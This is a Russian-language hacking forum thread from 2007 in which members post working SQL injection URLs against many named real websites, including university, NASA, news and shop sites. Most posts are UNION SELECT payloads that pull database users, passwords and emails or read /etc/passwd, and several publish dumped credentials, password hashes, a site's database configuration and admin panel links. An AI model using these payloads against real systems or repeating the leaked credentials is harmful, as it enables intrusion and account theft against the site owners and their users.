30.01.2007, 20:21
и ещёёёё +)
http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10/*
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
http://www.deltasigmacorp.com/version2/category.php?id=-1+union+select+1,2,3/*=)
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, %2010,11,12,LOAD_FILE(char(47,101,116,99,47,112,97 ,115,115,119,100)),14,15,16,17,18,19,20,21,22,23,2 4,25,26%20,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42/*
/etc/passwd
snak3.h17.ru/tools - тут меняем кодироФФку(char etc)
crb02.gsfc.nasa.gov
http://crb02.gsfc.nasa.gov/personnel/viewperson.php?id=4'+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*
www.ueet.nasa.gov
http://www.ueet.nasa.gov/toi/viewtoi.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
human-factors.arc.nasa.gov
http://human-factors.arc.nasa.gov/ihh/web/accomplishments/news/news_item.php?id=-1+union+select+1,2,3,4,5,password,7,8+from+user/*
crb02.gsfc.nasa.gov
http://crb02.gsfc.nasa.gov/personnel/viewperson.php?id=4'+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*
www.ueet.nasa.gov
http://www.ueet.nasa.gov/toi/viewtoi.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
даа, на насе вообще туева хуча скулей =\
InferNo23
31.01.2007, 09:01
NSKFitness.ru
http://www.nskfitness.ru/articles.php?cat_id=-1+union+select+1,2,user(),version(),5,database(),7 ,8,9,10,11/*
http://stat.euv-ffo.de/cgi-bin/scripts/user/user_view/user_profile.php?user_id=-5%20union%20select%201,2,3,4,5,6,7,8,9,0,11,22,33, 44,55,66,77,88%20from%20users/*
http://www.kinoman.net/index.php?page=disco&s=album&id=-18%20union%20select%201,2,3/*
http://www.transformersfanfic.com/index.php?view=PublicSubmission%2FRateList&submission_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0/*
http://www.three-rings.com/gorytunes/smooves.php?user_id=-5%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8/*
http://www.eco-housing.org/eco/print.php?type_id=-20%20union%20select%201,2,3,4,5,6,7%20from%20user/*&type=news
=)
http://www.deltasigmacorp.com/version2/category.php?id=-1+union+select+1,2,3/*
там названия таблиц же есть и столбцы уже есть) че не вывел ан примере) хотя там стоющего ничего нет)
http://www.rleague.com/db/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Thanat0z
01.02.2007, 05:05
http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39/*
http://jah.ru/foto/showphoto.php?photo=-99+union+select+1,2,3,4,5,concat(username,0x3a,pas sword),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25+from+user/*
http://mac.clanhalo.net/index.php?page=player_history&user_id=-6%20union%20select%201,concat(username,char(58),us er_password)%20from%20phpbb_users/*
Только там пароли не полностью показываются
Dracula4ever
01.02.2007, 13:06
http://www.aceton.pl/category.php?id=-1+union+select+1,2,3/*..
http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39/*
http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,LOAD_FILE(char(47,101,116,99,4 7,112,97,115,115,119,100))/*
а че не до конца?)
Дракула жжет =)
даже инъекцию не сделал нормально =)
http://www.aceton.pl/category.php?id=-1%20union%20select%201,2,3,4%20admin/*
Польский язык не знаю..но остается ток в поле 3 подобрать логин с паролем =)
Thanat0z
01.02.2007, 15:55
http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,LOAD_FILE(char(47,101,116,99,4 7,112,97,115,115,119,100))/*
а че не до конца?)
не освоил я пока все эти лоад файл и чары :)
http://www.avtorinok.ru/news/news_firms.php?id=-1+union+select+1,2,3,4,5,login,password,8,9+from+u sers/*
http://www.vw-club.lv/index.php?mnpg=1&subpg=2&month=11&year=-1+union+select+1,2,concat(username,char(58),passwo rd),4+from+user+limit+1,1/*
Пасс у Админа смешной )
InferNo23
02.02.2007, 17:29
http://notes.asdplus.ru/shop/
около 100юзеров
http://notes.asdplus.ru/shop/view.php?id=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14 ,email,nick,17,18,pass,20+from+users+limit+1,2/*
админку не нашел=\ пасс: 31415 логин: admin
Научился, сделал:
http://pct.ru/news.htm?id=-1+union+select+1,2,database(),4,user()/*
Что можно сделать ещё кроме database() user() ersion() и подобных ?
}{0TT@БЬ)Ч
02.02.2007, 18:04
http://notes.asdplus.ru/shop/
около 100юзеров
http://notes.asdplus.ru/shop/view.php?id=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14 ,email,nick,17,18,pass,20+from+users+limit+1,2/*
админку не нашел=\ пасс: 31415 логин: admin
http://notes.asdplus.ru:2082/login/ тока логин и пасс не подходят :(
Научился, сделал:
Что можно сделать ещё кроме database() user() ersion() и подобных ?для начала вот зашиврованный пасс админа
http://pct.ru/news.htm?id=-1+union+select+1,2,3,4,user_password+from+phpbb_us ers+where+user_id=2/* также есть таблица users ;)
Чтото не могу таблицу найти!
http://www.origami.as/gallery.php?gallery=17&image=-304+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15;
Здесь даже не пробовал!
http://vechirka.kiev.ua/issue.php?np=232&id_issue=7'
http://www.totalmusic.ru/default.php?labels_id=172'&page=1&sort=4a'
Здесь есть пароль нет логина:
ttp://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18+from%20+users+wh ere+id=5/*
guest3297
02.02.2007, 20:53
2Rebz
Да нет, это ты не сделал там нету таблицы admin.
http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+from+admin/*
http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+Rebz_lol/*
}{0TT@БЬ)Ч
02.02.2007, 20:55
http://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass,char(58) ,name),3,4,5,6%20,7,8,9,10,11,12,13,14,15,16,17,18 +from+users+where+id=5/* Ig-FoX а это что тогда? :D
guest3297
02.02.2007, 20:57
Что можно сделать ещё кроме database() user() ersion() и подобных ?
system_user() now() load_file() count(*)
http://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass,char(58) ,name),3,4,5,6%20,7,8,9,10,11,12,13,14,15,16,17,18 +from +users+where+id=5/* Ig-FoX а это что тогда?
Это нейм, но он для авторизацыи не используется! Для авторизыцыи используется другой. по сути логин но сгенерированый уже самим форумом!
http://www.perlovka.ru/shownews.php?op=show&n_id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables+limit+21,1/*
Termin@L
02.02.2007, 22:40
http://gramota.ru/idictation/idictation.php?id=-1+union+select+1,2,3,4,5/*
http://www.fondsk.ru/article.php?id=495+union+select+1,2,3,4,5,6,7,8,9, 10,11/*
\\\\\
http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать
\\\\\
http://www.vesti7.ru/news?id=9671
http://www.nbu.com/news/read.php?id=935
эти очень похожи на инъекцию, но подобрать кол столбцов не получилось
"Ляпис Трубецкой" :D
http://www.lyapis.com/news_full.php?type=news&id=-99'+union+select+1,2,3,4,concat(login,0x3a,passwor d)+from+users+limit+1,1/*
http://drive-tv.ru/site/index.php?sys_page=main&sys_link=2&sys_blok=2&news_id=-1637%20union%20select%201,2,3,4%20from%20mysql.use r/*
Termin@L
03.02.2007, 01:37
http://galagraphics.kz/image_produce.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(subscriberId,char(58),subscriber,char(58),code), 0x71),0x71),5,6+from+post_subscribers/*
http://www.tesclub.ru/guide/country.html?id=-3
http://www.2gis.ru/about/news/id=18'
вот ещё парочка
http://www.atk-studio.ru/relations/forum/index.php?type=forum&showUser&user_id=6%20union%20select%201,nick,3,4,password,e mail,7,8%20from%20users/*
http://news.samaratoday.ru/showNews.php?id=-105950%20union%20select%201,2,3,null,5,username,em ail,phone,9,0,11,22,33,44,55%20from%20users/*
InferNo23
03.02.2007, 16:25
AutoTeatr.ru
http://www.autoteatr.ru/catalog.php?id=-111+union+select+1,user(),3,4,version(),database() ,7,8,9,10,11,12,13/*
Airis.ru
http://www.airis.ru/dpage.php?pgname=catalog.php&qt=good&ID=1+union+select+1,2,3,4,user(),version(),7,8,9,1 0,11,12,13,current_date(),15,16,database(),18/*
Kbor.ru
http://www.kbor.ru/catalog.php?id=11111111+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,user(),15,16,17,18,19,database(), 21,22,23,24,25,26,27,28,version(),30,current_date( ),32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51/*
konkord.dp.ua
http://konkord.dp.ua/catalog.php?id=1111+union+select+1,user(),version( ),4,5,6,7/*
guest3297
03.02.2007, 16:29
http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать
тут нету иньекции... вывод ошибки не sql.
_http://www.artisticsavants.com/member_art.php?member_id=18+union+select+1,2,3,4,c oncat(email,char(58),password),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35+from+TblMember/*
http://zaz.kiev.ua/get.php?type=page&src=../../../../../etc/passwd
как машину назовут, так она и поедет...про сайт аналогично :)
http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,'hmm',6,7,8,9,10,11,12/*
таблицу с юзерами пока что не подобрал =\
http://www.samtelecom.ru/index.php?showfile=1&fid=22&p=downloads&area=1&categ=999+union+select+1,user(),3/*
4ё-то таблицы пока что не подобрал =\ позже мб
InferNo23
03.02.2007, 21:56
http://www.ascon.ru/order.php?id=-1+union+select+1,2,user(),database(),version()/*
}{0TT@БЬ)Ч
04.02.2007, 00:19
http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,'hmm',6,7,8,9,10,11,12/*
таблицу с юзерами пока что не подобрал =\
2ice1k
Держи http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,5,6,7,concat(login,0x3a,p assword),9,10,11,12+from+webismedia_users/* ;)
2ice1k
Держи http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,5,6,7,concat(login,0x3a,p assword),9,10,11,12+from+webismedia_users/* ;)
mla, naverno vse pereproboval krome webismedia_users :D
vstre4a vipusknikov vidat' povliyala :D
thx
Интернет-служба ITStar - разработка, оптимизация, раскрутка и продвижение сайтов, хостинг, качественный WEB дизайн, PHP, PERL, XML, XSLT, MySQL, CMS
Много же они о себе возомнили =)
http://www.itstar.ru/template.php?dept_id=-99+union+select+1,2,3,0x707265766564,5,6,7,8,9,10, 11,12,13,14/*
Дальше даже юзать не стал пытаться... Аж как-то "стыдно" за таких "отечественных разработчиков" =\ А ведь ещё столького о себе понапишут...
ADD:
http://master-site.com/docs/portfolio/index.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
ADD:
http://webmanager-pro.com/index.php?lang_id=1&content_id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user ()/*
интересная sql'я сначала даже не понял, где инфа выводится :)
мда
http://www.uralweb.ru/catalog/card.php?id=-99'+union+select+1,2,concat(convert(user+using+cp1 251),0x3a,convert(password+using+cp1251)),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31+from+mysql.user+limit+0,1/*
http://www.uralweb.ru/catalog/card.php?id=-99'+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31/*
etc... =\
/*****************************/
http://www.golodomor.org.ua/speech.php?id=-1+union+select+1,user,pass+from+users/*
admin:260729
/******************************/
http://studybank.info/viewdetails.php?id=-1+union+select+1,2,3,4,5,6,7,passwd,9,10,11,12,use rname,14+from+user/*
avdinform:123slay
/******************************/
http://tema.in.ua/article/?id=-1+union+select+1,2,3,4,5,7,8,9,10,11,12,13,14,15,1 6,17,18,19/*
/******************************/
http://www.fri.net.ua/loadnews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*8&page=1
/******************************/
http://www.kiis.com.ua/index.php?id=-1+union+select+1,2,3,4,user(),6,7,9,8/*&sp=1
/******************************/
http://www.iom.org.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users/*&sub_id=103&action=content&wlng=u
/******************************/
http://www.golosiyiv.kiev.ua/art?id=-1+union+select+1,2,password,4,5,6,7,8,9,10,11+from +users/*
/******************************/
http://www.techinvest.com.ua/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*&lang=ua&type=com&act=single
Сибирь-Телеком
_http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,2/*
с названием таблиц беда(
_http://inform.com.ua/index.php?s=52'
_http://www.buhgalteria.com.ua/Answer.html?id=2869'
_http://www.ukraina.net.pl/index.php?art=pokaz&num=1241'
_http://www.promsvyaz.kiev.ua/index.php?menu_word=4&command=more&id_news=42&lang=1'
_http://www.video.lg.ua/search.html?beg='
_http://www.el-drive.com.ua/forum/Profile.php?UsId='
http://www.beatles.ru/postman/club_birthday.asp?m=2&d=1+or+1=(SELECT+TOP+1+cast(user_name+as+nvarchar) %2B%27%3A%27%2Bcast(user_email+as+nvarchar)%2B%27% 3A%27%2Bcast(user_Password+as+nvarchar)+from+users %20where%20user_id=58)--
А есть какой-нибудь способ вывести инфу со всех пользователей сразу?
Сибирь-Телеком
_http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,2/*
с названием таблиц беда(
Почему беда?
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+table_name,2+from+INFORMATION_SCHE MA.TABLES+limit+16,1/*
:p
}{0TT@БЬ)Ч
04.02.2007, 16:20
Почему беда?
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+table_name,2+from+INFORMATION_SCHE MA.TABLES+limit+16,1/*
:p
ice1k мля опередил хотя можно помотреть database() и понять что префикс таблицы ds_users ;)
ice1k мля опередил хотя можно помотреть database() и понять что префикс таблицы ds_users ;)
Ну так то да, но мало ли - может ему не только юзеры нужны ;)
Ну так то да, но мало ли - может ему не только юзеры нужны ;)
хм...INFORMATION_SCHEMA.TABLES юзал тока поимел какую то херь..типа charatacter set...ща алкоголь из башки выйдет..обдумаю
а по поводу префикса таблиц то пробовал ds_Esir ...промахнулся
P.S понял теперь как INFORMATION_SCHEMA.TABLES читать :)
}{0TT@БЬ)Ч
05.02.2007, 00:51
вот от меня ;)
http://www.murmansport.ru/modules.php?op=modload&name=News&file=article&sid=-865+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+nuke_users/*
похоже что это PHP-Nuke, пробовал колонки которые должны быть ни одной не подобрал или админ сцуко добавил в них префикс))))
еще одна :D
http://www.advokaty.net/referat.php?id=-5933+union+select+1,AES_DECRYPT(AES_ENCRYPT(email, 0x71),0x71),3,4,5,6,7+from+advokaty/*
InferNo23
05.02.2007, 17:37
Zhaba.ru
http://zhaba.ru/flash-games.php?page=-1+union+select+1,username,user_password,4,5,6,7,8, 9,user(),11+from+phpbb_users+where+user_id=3/*
Tamizdat.org
http://www.tamizdat.org/article.php?id=99999+union+select+1,2,user,4,5,6,7 ,password,9,10,11,12,13+from+mysql.user/*
AllAboutJazz.com
http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),15,16,17,18,19,20,21,version(),23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,database(),39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,current_date (),73,74,75,76,77/*
Fujirangefinder.com
http://fujirangefinder.com/user.php?id=-1+union+select+1,current_date(),user(),4,user(),ve rsion(),database(),8,9,10,11/*
Fotoforma.ru
http://www.fotoforma.ru/texts.php?ID=-1+union+select+1,2,3,4,5/*
Cineclassic.com
http://www.cineclassic.com/fiche.php?film_id=999+union+select+1,2,3,4,user(), 6,7,database(),9,10,11,version(),13,current_date() ,15,16,17,18,19,20,21,22,23/*
Lancellot
05.02.2007, 20:45
http://blogsforlearning.msu.edu/articles/view.php?id=-1%20union%20select+1,2,3,4,5,6,7,8,9/*
посоветуйте что дальше можно зделать!
Termin@L
05.02.2007, 23:01
хм...INFORMATION_SCHEMA.TABLES юзал тока поимел какую то херь..типа charatacter set...ща алкоголь из башки выйдет..обдумаю
а по поводу префикса таблиц то пробовал ds_Esir ...промахнулся
P.S понял теперь как INFORMATION_SCHEMA.TABLES читать :)
не парься -вот
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,concat(login,char(58),passwd,cha r(58),email)+from+ds_users/*
90 таблиц перебрал блин
}{0TT@БЬ)Ч
05.02.2007, 23:24
не парься -вот
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,concat(login,char(58),passwd,cha r(58),email)+from+ds_users/*
90 таблиц перебрал блина нах переберал? я же выше написал :D
Termin@L
05.02.2007, 23:26
Пост пропустил)))
http://www.crdf.ru/?id=15'
http://www.pratt.duke.edu/news/?id=-1'
не могу кол-во ст подобрать
}{0TT@БЬ)Ч
06.02.2007, 00:40
http://blogsforlearning.msu.edu/articles/view.php?id=-1%20union%20select+1,2,3,4,5,6,7,8,9/*
посоветуйте что дальше можно зделать! Что тут советовать бери и расшифровывай ;)
http://blogsforlearning.msu.edu/articles/view.php?id=-1+union+select+1,2,3,concat(user_login,char(58),us er_pass,char(58),user_email),5,6,7,8,9+from+wp_use rs/*
Thanat0z
06.02.2007, 04:06
нашел на 777.biz.ua инъекцию, а потом с огромной помощью c411k и _-[A.M.D]HiM@S-_ была добыта разнообразная инфа.
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),passwor d),4,version(),6,7,8,9+from+mysql.user
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),passwor d),4,version(),6,7,8,9+from+mysql.user+limit+4,3
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,load_file(char(47,101,116,99 ,47,112,97,115,115,119,100)),4,5,6,7,8,9+from+mysq l.user/*
admin:kRX.3VVi1kp0Q
Anna:3uqauoqXBOygw
Lina:GkgDkPlYVkkiM:zaq1qaz
Tina:gpL6.5zhbQLic
Yuve:1EmcyGHTQK5xY
frukt:6fsFeWu7hSTzA
vini:ijZtKQgJtn7JM
luke:BWilMcUu7Zq.Y
bandit:_UWF9hYsfZlVY
хороший кусок конфига
$myCon['user']="frukt";
$myCon['password']="zaq1";
//$myCon['host']="82.144.221.59";
//$myCon['host']="213.186.114.123";
$myCon['host']="localhost";
$myCon['db']="777_db1";
главные базы
lucky\_mychat1
eximstats
horde
leechprotect
lucky\_db1
[+] (https://forum.antichat.ru/reputation.php?p=277159) _-[A.M.D]HiM@S-_
[+] (https://forum.antichat.ru/reputation.php?p=276473) c411k
InferNo23
06.02.2007, 15:02
Sklon.ru
http://www.sklon.ru/print.php?p=world-news&m=menu1&l=ru&view=-1+union+select+1,2,3,table_name,5,6,7+from+INFORMA TION_SCHEMA.TABLES+limit+71,72/*
Venus.ru
http://www.venus.ru/news.php?id=-1+union+select+1,2,3,4,user(),6,version(),database (),9,10,11/*
ppkp.ru
http://www.pkpp.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Ezgulik.org
http://www.ezgulik.org/news.php?id=-1+union+select+1,2,version(),user(),5,6/*
Termin@L
06.02.2007, 17:10
http://football.sport.com.ua/news.phtml?id=20238888+union+select+concat(usernam e,char(58),password),2,3,4,5+from+users/*
Lancellot
06.02.2007, 20:22
http://www.schulweb.de/de/archiv/einzelergebnis.html?Id=-1+union+select+concat(user,char(58),password)+from +mysql.user/*
чето пасс нельзя посотреть
http://www.schulweb.de/de/archiv/einzelergebnis.html?Id=-1+union+select+concat(user,char(58),password)+from +mysql.user/*
чето пасс нельзя посотреть
http://www.schulweb.de/de/archiv/einzelergebnis.html?Id=-1+union+select+concat(user,char(58),password)+from %20+mysql.user+limit+1,1/*
[Спартак]
http://www.spartak.ru/season06-07/games/calendar.php?month=-99+union+select+1,2,3,4,5,6,7,8,9,user(),11/*
http://www.hc-spartak.ru/online/?id=999999'+union+select+1,2,concat(nick,0x3a,pass ),4,5,6+from+users/*
admin:smadmin
http://www.hc-spartak.ru/admin
:)
http://www.mymaika.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,concat(0x3c62207374796c653d22636f6c6f723 a20234138413841383b20666f6e742d73697a653a203230707 8223e44423a20,database(),0x3c6272202f3e4c6f67696e3 a20,user(),0x3c6272202f3e4d7953514c3a20,version(), 0x3c6272202f3e3c2f623e),20,21,22/*
http://kizhi.museum.karelia.ru/shop/shop.php?categ=-1+union+select+1,2,3,4,5,user(),7,8/*
http://onlog.ru/?h=parts&id=-1+union+select+table_name,concat(0x3c62207374796c6 53d22636f6c6f723a20236666666666663b20666f6e742d736 97a653a2032307078223e44423a20,database(),0x3c62722 02f3e4c6f67696e3a20,user(),0x3c6272202f3e4d7953514 c3a20,version(),0x3c6272202f3e3c2f623e)+from+INFOR MATION_SCHEMA.TABLES+limit+1383,1/*
Теперь можно и спать идти :D
http://www.divan-tut.ru/collection.php?id=-1+union+select+1,load_file(char(47,101,116,99,47,1 12,97,115,115,119,100)),3,4,5,6/*
Чтото раздобыл
http://www.mymaika.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,concat(0x3c62207374796c653d22636f6c6f723 a20234138413841383b20666f6e742d73697a653a203230707 8223e44423a20,database(),0x3c6272202f3e4c6f67696e3 a20,user(),0x3c6272202f3e4d7953514c3a20,version(), 0x3c6272202f3e3c2f623e),20,21,22/*
http://mymaika.ru/?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,concat(name,0x3a,pwd),20,21,22+from+ma ika_users/*
Termin@L
07.02.2007, 11:31
http://mp3zzz.ru/alb/-99
я не могу подобрать кол-во столбцов, это вообще инъекция?
InferNo23
07.02.2007, 12:59
E-Disc.ru
больше 5к юзеров
http://e-disc.ru/details.php?Id=-1+union+select+1,2,3,lastname,5,pwd,7,8,9,10,11,12 ,13,14,country,16,17,18,city,20,21,22,23,24,25,26, email+from+users+limit+5000,5001/*
пароли к лич.каб на сайте не подходят, но у многих стоит у мыла тот же пароль. all_x@mail.ru:13011973 например...
2 терминал
http://mp3zzz.ru/alb/3-1 == http://mp3zzz.ru/alb/2
скуля вроде есть, но колонки подобрать не могу=\..
Schooly_D
07.02.2007, 15:12
http://www.danpal.dk/index.php?doc=99999+union+select+1,2,3,4,5/*
_http://www.vanta.ru/script/catalog.php?cat=2+union+select+1,user(),3,database (),5,6,7,8,9,10/*&clas=2
Lancellot
07.02.2007, 19:20
http://www2.avis.it/usr_view.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51/*
не могу подобрать
Termin@L
08.02.2007, 00:31
http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,3,4,5,6,7/*
\\\
http://www.volgagis.ru/web/editweb.php?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(V ERSION(),0x71),0x71),7,8,9,10,11,12,13/*
люди пишут сайты)))
одна из их "работ"
http://news.ivolga.ru/index.php?idnews=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VER SION(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16/*&r=0&rn=0
интересно, что они курят...
http://www.sbbs.ru/news/index.php?id=999999999999+union+select+1,2,3,4,AES _DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7,8,9 ,10,11,12,13,14,15,16/*
http://www.sport.com.ua/vote.phtml?id=-1+union+select+concat(username,char(58),password), 2+from+users/*
maxim:91c0a0fbe2633617b9400c60ba9e0127
http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/*
admin:de6d357c726f1d42c63b00ef18fc0d3f
http://www.untp.kiev.ua/index.php?id=-1+union+select+1,2,3,4,5,7/*
http://www.wrs.com.ua/?id=-1+union+select+1,2/*
Termin@L
08.02.2007, 19:32
http://www.onconference.ru/conferences/index.html?id=
http://www.promved.ru/articles/article.phtml?id=1005&nomer=9999+union+select+1,2,3,4/*
http://www.uprava.org/section.php?id=-99+union+select+1,2,3,4,6,7,8/*
_http://www.promdesign.com.ua/forum.html?level=3&pid='
_http://whoiswho.crimea.ua/result_s.php
_http://infoprom.com.ua/catalog.php?id=5'ion_id=&letter=&by=30&page=3
_http://www.boiko.com.ua/index.php?pname=childrens_home&p2=6'
http://forum.siemens-club.ru/viewboard.php?BoardID=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*
Подобрать не могу :(
Lancellot
08.02.2007, 22:28
SQL -ihj в 4 images
вот сплойт <target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20
user_password%20from%204images_users%20where%20use r_name=%2527ADMIN
вот сайт:http://www.sashapivovarova.com/galleryfans
подстовляю сплойт и ничего не происходит
Thanat0z
09.02.2007, 05:42
что-то у меня ничего не получается сегодня - неудачные скули, количество подобрал, а селект запрещен, а третий линк просто улыбнул
http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19/*
http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*
http://digitalfx.ru/index.php?newsid=1146316404'
что-то у меня ничего не получается сегодня - неудачные скули, количество подобрал, а селект запрещен, а третий линк просто улыбнул
http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19/*
http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*
http://digitalfx.ru/index.php?newsid=1146316404'
Вай селект запрещён?:
http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,user()/*
а http://www.e-financialconsulting.com 4ё-то у меня не грузится вообще =\
Чет немогу понять :/
http://www.nybmwcca.org/events.php?id=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*
а вот это ваще хрень
http://www.nybmwcca.org/events.php?id=1+union+select+concat(user,char(58), password)+from%20+mysql.user/*
Thanat0z
09.02.2007, 06:52
Вай селект запрещён?:
http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,user()/*
хм...я как-то так делал что оно мне говорило
Юзеру такому-то запрешен СЕЛЕКТ с базы.
http://www.synergisticresearch.com/
У тебя конструкция concat(user(),char(58),password()) прошла?
_http://www.fhm.com.ua/hospital/?numid=5'
_http://www.fenix.com.ua/pub/view_3x6.php?id=99+union+select+%205,16,17,18,user (1)/*
_http://www.vitrenko.org/start.php?lang=1&part_id=6'
_http://www.nasheradio.net/news2.php?id=22'
_http://bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=224'
Thanat0z
09.02.2007, 14:23
_http://www.fhm.com.ua/hospital/?numid=5'
_http://www.fenix.com.ua/pub/view_3x6.php?id=99+union+select+%205,16,17,18,user (1)/*
_http://www.vitrenko.org/start.php?lang=1&part_id=6'
_http://www.nasheradio.net/news2.php?id=22'
_http://bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=224'
не выкладывай плиз инъекции где нельзя выводить полезную инфу (юзер,пасс), а то и так перебирать много :)
InferNo23
09.02.2007, 17:24
UpTime.ru
8000 юзеров..
http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,icq,8,9, 10,11,12+from+users+limit+8200,8201/*
InferNo23
09.02.2007, 17:38
Хостинг RussWeb.ru
